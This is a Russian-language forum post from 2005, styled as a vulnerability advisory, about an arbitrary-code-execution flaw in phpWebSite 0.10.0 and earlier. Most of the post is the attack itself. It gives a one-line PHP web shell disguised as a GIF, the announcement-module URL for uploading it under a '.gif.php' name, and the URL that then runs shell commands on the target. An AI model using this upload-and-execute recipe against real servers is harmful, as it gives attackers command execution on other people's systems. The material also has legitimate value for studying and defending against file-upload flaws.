• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимость в Phpwebsite

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Дата: 25 февраля 2005

Воздействие: Выполнение произвольного кода, Пользовательский доступ через сеть

Версия (и): 0.10.0 и предыдущие версии

Описание: Об уязвимости сообщили в phpWebSite. Отдаленный пользователь с привилегиями загружать файлы изображения может выполнить произвольные команды на системе использующей phpWebSite.

Отдаленный пользователь может создать особенно обработанный файл, который будет отформатирован как файл GIF, но фактически содержит следующий код PHP:

?passthru ($_GET [nst]);?

Если отдаленный пользователь имеет привилегии представить объявления, отдаленный пользователь может вызвать следующий тип URL и загрузить особенно обработанный файл как файл Изображения с названием формы: "[anyname] .gif.php":

http://[target]/index.php?module =announce&ANN_user_op=submit_announcement&MMN_position=3:3

Тогда, отдаленный пользователь может загрузить следующий URL, чтобы выполнить команды на системе:

http://[target]/images/announce/[anyname].gif.php?nst=ls -la

Решение
: Во время выхода эксплоита, решения не было
Причина: Входная ошибка проверки правильности
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх